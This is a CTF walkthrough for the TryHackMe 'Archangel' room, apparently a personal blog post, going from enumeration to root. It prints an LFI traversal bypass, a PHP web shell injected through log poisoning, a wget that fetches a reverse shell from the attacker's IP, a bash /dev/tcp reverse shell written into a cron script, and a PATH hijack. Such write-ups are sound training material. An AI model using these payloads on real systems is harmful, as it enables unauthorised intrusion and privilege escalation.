Archangel | TryHackMe Walkthrough

Enumeration

We will run nmap

nmap -A $IP -v -o nmap.scan -p-

We have 2x ports open: 22 ssh and 80 http

Because we know there’s port 80 open on the webserver we should see what directories we can find…

Run gobuster

gobuster dir -u $IP -w /usr/share/wordlists/dirb/common.txt -o go.scan

/flags…can it be this easy? We’ll find out!

From this, we can see there’s a ‘flags’ directory — let’s check it out. A text document labeled flag.html is in there… but where does this html page lead… Yep. Nice one arch… nice one. You got me.

After brushing off Rick’s Roll, we can just view the plain website.

Let’s see if we can find any clues in here… start checking out dem links! From a quick recon, we can deduce the following:

1. That there’s a gallery tab with a bunch of empty photos. Maybe we can upload something here in the future? (spoiler alert: no.)
2. The whole page is in Lorem Ipsum, ok useless fact.
3. Source reveals an e-mail… @mafialive.thm which can hint to us that this is the domain name this box contains.

mafialive.thm is our target domain

No robots.txt, bummer. But no biggie.

Side-bar, visiting /layout and /pages reveal nothing interesting.

Let’s add mafialive.thm to our hosts file and see where this new domain takes us.

sudo /etc/hosts

Navigate to the website and you will see our first flag.

I’m going to rerun Gobuster with http://mafialive.thm/ with medium-directory-2.3 — while this runs, try some obvious directories such as /secret /admin /mafia /login /arch — nada.

Hint says Fuzz… let’s fuzz using zap. I did a quick scan of the domain, and it revealed a robots.txt and test.php.

Robots.txt — which reveals /test.php (which zap also identified but worth checking anyways).

Well, there’s… a button. Let’s see what this button does. I feel like Homer Simpson right now.

Push the button… Galvanize anyone? Hit me up on Twitter if you catch the ref ;)

Ok we see that this action changed our URI, which added a view parameter. We also know that this room is partly about LFI, so let’s focus on this clue…

Local File Inclusion

Let’s use LFI. Using this LFI cheat sheet, I systematically tried things until I got a hit with the mrrobot.php file and test.php file.

http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/mrrobot.php

http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php

What is this sorcery? Well, if we read what we’ve just done it becomes more obvious. We are telling the server to serve us mrrobot.php and test.php in base64 encoded format. So we can read these two php files now by decoding the strings.

mrrobot.php base64 decodes into the following:

This is the text we saw earlier when we galvanized…

test.php base64 decodes into the following… which also contains a flag!

What is happening here? Let’s look at the code as per our hint.

By running test.php, it allows us to use a ‘view’ parameter that we saw earlier, but conditional to two rules:

1. The URI must NOT contain ‘../..’
2. The URI MUST contain ‘/var/www/html/development_test’

Great, we know the rules, let’s play with some LFI.

This is where I was a bit stuck chasing my tail all night as I was unfamiliar with it, but after reading some articles on LFI and cheat sheets to try finding log files, I was able to get further. Perhaps I shouldn’t have been basking in some of my green Canadian freedom while hacking but hey, #legalherebro #ujelly.

Here is the logic behind what we need to achieve:

1. Find a way to inject a log file with code that will enable us to execute an additional command so we can bind to a reverse-shell.
2. That’s it. Really, that’s it… but to get to this result, can be tricky for beginneresk hacker babies such as myself.

Log poisoning

After doing some reading on LFI (Google.Is.Your.Friend.), I found out that Apache2 stores its access log file under /var/www/apache2/access.log, which is also common to inject to achieve our goal. What does this file do? It logs access requests from clients. So…. what if we can throw in some code to this log file to allow us to run commands? Enter Burpsuite. *belches*

We can change our User-Agent in the request to insert some code, thus being logged in the log file, and enabling us to execute codes — so long as we query the log file in our URL first.

But wait a minute… how do we get to this log file if we can’t use ‘../..’ ? Easy. Bypass. ‘..//..//..’ will be interpreted the same as ‘../../..’. (This stumped me for an hour or two *shies away in a corner*).

Pay special attention to the User-Agent header that I modified with <?php system($_GET[‘cmd’]); ?>

Now that the log file is already poisoned with that php script, we can include it in our URL, and use the ‘cmd’ parameter.

http://mafialive.thm/test.php?view=/var/www/html/development_testing//..//..//..//log/apache2/access.log&cmd=uname

Test that out, and you should see a whole bunch of text output by the access.log. The more you run this url, the deeper you will drown in text (because every command is ‘logged’). Example:

I ran this with a few different things to show you how congested this can get. If it’s too painful, use Ctrl+F or reboot your machine.

Now that we confirmed we have Remote Command Execution (RCE), let’s get a shell by using that ‘cmd’ parameter to pass code invoking a reverse shell. I tried (as you may see above) a few things such as bash, nc, etc through the URL (encoding it and everything) but was unable to secure a shell that way. So I went a slightly different route… I created the shell on my machine and fetched it from the RCE.

First ensure your shell is made (I use the php-reverse-shell.php included in Kali):

You can change the name to ‘shell.php’ like I eventually did to make it easier.

Once that’s done, ‘wget’ this from the URI:

http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log&cmd=wget http://10.6.55.167:5555/shell.php

You can verify it’s uploaded by just accessing the access.log like we did previously and searching for our ‘shell.php’ file through the ‘ls -l’ command.

RCE — Reverse Shell

Once you can confirm your shell was successfully uploaded to the server, open up a netcat listener on the port set in your shell (mine was 1234) and then navigate to : http://mafialive.thm/shell.php.

Bada-bing bada-shell!

Now we have access to the terminal. Time to upgrade this shell, I grabbed my notes to do this :

You can then “Ctrl+Z” to background your shell, run ‘stty raw -echo;fg’ to have a real stable shell and bring it back to the foreground.

Now we can find out first flag in the shell quite easily with some basic CTF-101 logic. Let’s go home.

cd home

cat the user.txt for your flag.

we see two directories, ‘myfiles’ and ‘secret’. Let’s start with the juicy secret directory… access denied. What about myfiles? Listing this rick rolls us… again. CLASSIC ARCHANGEL!!! 2 for 2 now! ;)

Privilege Escalation — archangel

Ok, since we can’t get the obvious stuff, let’s go ahead on upload a script to check for some interesting stuff — Linpeas.sh

Start up a python server in the directory your linpeas.sh is located and ‘wget’ with the victim box. Oops… error: Access Denied. Switch to /tmp first because we cannot save files in our current directory. Success.

Ok, let’s chmod +x linpeas.sh and run it on the victim box to enumerate the system and find some vectors that we can PrivEsc.

Let’s scan the output for anything useful… usually we can find something fishy in the SUIDs or CRON jobs.

SUIDS:

nothing out of the ordinary…

Nothing we can exploit. Moving on.

Cronjobs:

Hello stranger…

We see there’s an interesting bash script in /opt/ that is a cron job and runs at 1 minute intervals. Let’s look at what it does.

Check those permissions out — we can write to this. Let’s exploit by injecting this with a reverse shell code.

We’ll grab a reverse shell that works with bash and input that line replacing what’s inside.

bash -i >& /dev/tcp/10.6.55.167/4242 0>&1

…and I made a mistake clearly lol. Still www-data — useless. Let’s modify our shell code.

Let’s try a nc reverse shell, but keep the original code in there (I typed it back in through nano on the victim machine). Remember this file is a cronjob? Good.

Now we setup a listener on our attacker machine with that same port we indicated just above… Don’t run the file, but leave it as is… patience… patience… *60 seconds or less goes by*

Shiiiiiet — we now archangel !

Let’s go get that user2 flag, in our home directory.

Privilege Escalation — root

There’s another file in there called ‘backup’. Trying to cat it, we get a bunch of gobbly-gook…

so let’s see if there’s anything interesting in there using ‘strings’. Scrolling through I see that there is a ‘cp’ command, let’s follow it.

we see that ‘cp’ isn’t using an absolute path… good news for us!

Our next hint to find the root flag states “Certain paths are dangerous” … we now know why ;). Let’s create a file called cp so we can trick this ‘backup’ program to use it instead by altering our path file… here’s how we do it:

First, we will create a cp file and chmod +x it to an executable. Then we want to ensure it contains the following code:

#!/bin/bash

bash -p

We then export our PATH variable to this folder, so when ‘cp’ is run, the system will look in the /secret directory by default. This can be changed by entering:

export PATH=/home/archangel/secret:$PATH

Run the ./backup file and we are now Root. Cat /root/root.txt FTW.

Thanks for reading, but more importantly thank you Arch for the awesome room!